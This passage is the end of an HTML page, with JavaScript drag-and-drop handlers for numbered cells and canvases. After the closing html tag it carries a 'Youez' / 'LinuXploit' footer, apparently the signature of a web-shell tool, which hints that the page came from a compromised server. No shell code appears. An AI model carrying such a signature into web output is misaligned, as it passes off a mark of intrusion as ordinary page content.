            webkit_drop.add('id_td_drop_no25', {onOver : function(){shared_highlight('id_canvas_no25')}, onOut : function(){shared_un_highlight2('id_canvas_no25')}, onDrop : function(){DragDrop('id_canvas_no25', ['id_span_no25'])}});
            webkit_drop.add('id_td_drop_no36', {onOver : function(){shared_highlight('id_canvas_no36')}, onOut : function(){shared_un_highlight2('id_canvas_no36')}, onDrop : function(){DragDrop('id_canvas_no36', ['id_span_no36'])}});
            webkit_drop.add('id_td_drop_no44', {onOver : function(){shared_highlight('id_canvas_no44')}, onOut : function(){shared_un_highlight2('id_canvas_no44')}, onDrop : function(){DragDrop('id_canvas_no44', ['id_span_no44'])}});
            webkit_drop.add('id_td_drop_no29', {onOver : function(){shared_highlight('id_canvas_no29')}, onOut : function(){shared_un_highlight2('id_canvas_no29')}, onDrop : function(){DragDrop('id_canvas_no29', ['id_span_no29'])}});
            webkit_drop.add('id_td_drop_no20', {onOver : function(){shared_highlight('id_canvas_no20')}, onOut : function(){shared_un_highlight2('id_canvas_no20')}, onDrop : function(){DragDrop('id_canvas_no20', ['id_span_no20'])}});
            webkit_drop.add('id_td_drop_no48', {onOver : function(){shared_highlight('id_canvas_no48')}, onOut : function(){shared_un_highlight2('id_canvas_no48')}, onDrop : function(){DragDrop('id_canvas_no48', ['id_span_no48'])}});

        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit